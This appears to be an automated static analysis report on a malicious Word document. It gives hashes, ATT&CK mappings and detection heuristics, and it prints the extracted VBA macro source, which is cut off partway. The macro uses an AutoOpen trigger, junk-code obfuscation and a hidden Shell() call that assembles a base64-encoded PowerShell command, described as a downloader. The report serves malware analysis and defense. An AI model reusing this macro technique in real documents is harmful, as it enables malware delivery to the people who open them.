Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 42ff820cd1217438…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 109.8 KB
Created: 2018-05-31 15:22:00
Authoring application: Microsoft Office Word
First seen: 2018-06-19
MD5: dab6a0c02b7f7daadb6d7f41e7da6d4e
SHA-1: 6b451ddb34c5b097a40422c3a1d434f569175657
SHA-256: 42ff820cd12174384cd62cbff64aa44465b479700c1e12fe078adffdcfc10432
Risk Score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen subroutine calls a function that uses the Shell() function to execute a command. This command appears to be a base64-encoded PowerShell command, likely intended to download and execute a secondary payload. The obfuscated nature of the script and the use of Shell() indicate downloader or dropper functionality.

Heuristics (6)

  • VBA macros detected (medium; 3 related findings; OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical; OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high; OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 16976 bytes
SHA-256: 6d1ad468a0aab3b6c7b0c872f1c87726c0d414563c56f144590d207acfa5da0e

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "SNQPNpiQwb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function wDhjPJDzBAE()
On Error Resume Next
Select Case KAlrcOiOT
      Case 95923
         aSADc = 58573
         ztHiVV = CDbl(97772)
      Case 45802
         TzJdt = TfWvr
         DpUczC = 4467
End Select
Select Case KAlJlwlZa
      Case 42725
         ldYtE = 81627
         OJUiX = CDbl(98245)
      Case 40681
         jnwtDm = XSwfO
         DXDTjR = 89448
End Select
wDhjPJDzBAE = McKzObjG + Shell(QfDHpZ + Chr(vbKeyP) + PrwXLDAl + diJDXmzY + MFqCVUoccA + WBlXRdG + qNPtJ + CiaJnU + vlTPz, VkNOwNvA + vbHide + BijcVRktBMz)
Select Case KAlWwqNiF
      Case 36925
         YitoEP = 97108
         jSPfFG = CDbl(93409)
      Case 49365
         cLlQLr = aoKpFj
         hmuuS = 71916
End Select
End Function
Sub Autoopen()
On Error Resume Next
Select Case KAlinZamN
      Case 3725
         mQBRl = 4779
         hMMnLN = CDbl(31160)
      Case 10665
         Xzuis = MioBw
         MqYdf = 21785
End Select
wDhjPJDzBAE
Select Case KAltnovV
      Case 74480
         hhiZM = 27065
         PCnTTW = CDbl(52060)
      Case 7550
         ckEXU = oKjCP
         VjEYv = 74925
End Select
End Sub


Attribute VB_Name = "izOokpwolJM"
Function PrwXLDAl()
On Error Resume Next
Select Case KAlwmPiEK
      Case 87315
         sOifN = 54166
         qsOwcI = CDbl(35195)
      Case 81168
         VqaIkC = jZttVD
         nqwriT = 13960
End Select
fosUlRivHi = "owers" + "HeLL -WinDowsT" + "yle hidde" + "n -e IA" + "AoACcAVAAnAC"
Select Case KAlzQaSEk
      Case 1553
         oivbJ = 27385
         kiqRzG = CDbl(38297)
      Case 66998
         mubFd = jXhfs
         iSwMi = 30581
End Select
jbSOdlOM = "sAJwBlAG8A" + "bgBzACcAKwA" + "nAGEAZAAnACsA" + "JwBhACcAKwAnA" + "HMAZAA" + "gAD0AIAAmAC"
Select Case KAlPZcoZ
      Case 13467
         IsBHk = 57479
         DfJJuf = CDbl(46113)
      Case 88906
         tdVYC = sFRqO
         zJGBw = 30178
End Select
iotfRbX = "gAJwArACcAS" + "ABDAFM" + "AbgBIACcAKwAnAE" + "MAJwArAC" + "cAUwArA" + "CcAKwA"
Select Case KAlrWauO
      Case 55024
         moDnkh = 40473
         iKDiL = CDbl(86281)
      Case 631
         ptPOFV = HvPQC
         TiGwX = 56863
End Select
KUjJi = "nAEgAQwBTA" + "CcAKwAn" + "AGUASABDAFMAKw" + "AnACsAJwBIAEMAU" + "wB3AC0Abw" + "BiACcAKw"
Select Case KAlCiGhw
      Case 92981
         wwQEOr = 50597
         BzOZQk = CDbl(91793)
      Case 83411
         RSwPb = lnPwtL
         hPJvHJ = 59949
End Select
PkcPzbchXf = "AnAGoAZQ" + "BjAEgA" + "JwArACcAQwB" + "TACsAJwArACc" + "ASABDA" + "FMAdABIAEMAU"
PrwXLDAl = fosUlRivHi + jbSOdlOM + iotfRbX + KUjJi + PkcPzbchXf
End Function
Function diJDXmzY()
On Error Resume Next
Select Case KAlBLcjh
      Case 12854
         wMTGml = 31554
         wLUAiQ = CDbl(99167)
      Case 89793
         YNRwPV = mMIPGV
         tqEpCd = 74553
End Select
vFZZH = "wAnACsAJwApAC" + "AAcgBhACcAKwA" + "nAG4AZA" + "BvAG0AO" + "wBUACcAKw" + "AnAGUAJw" + "ArACcAbwBZAF" + "kAJwArACcAVQAgA"
Select Case KAlBRjLj
      Case 74015
         AuBQv = 21570
         oiirp = CDbl(38832)
      Case 51161
         AZcfaK = bzRuzM
         PElrd = 23011
End Select
USXGAsSrRDj = "D0AIAAuAC" + "gAJwArACc" + "ASABDAFMAJwArA" + "CcAbgBlA" + "EgAQwB" + "TACsASABDAFMAdw" + "AnACsAJwBIAEM" + "AUwArACcAKwAnA" + "EgAQwBTACcAKwAn"
Select Case KAlNpaUa
      Case 3775
         GKnSw = 48083
         JjELw = CDbl(48805)
      Case 38135
         zBLHo = iFwqO
         mkBKA = 15526
End Select
zWAQIXhtwM = "AC0AbwAnACsAJw" + "BiACcAKwAnAGo" + "AZQAnACsAJwBjAH" + "QASABDACcAKwAn"
Select Case KAlUmdbA
      Case 75452
         FUhffm = 88933
         pZISN = CDbl(3384)
      Case 54048
         pcjKd = htKqT
         SWZLUE = 26070
End Select
JXBUvSjIK = "AFMAKQAgAF" + "MAeQBzAHQAZQ
... (truncated)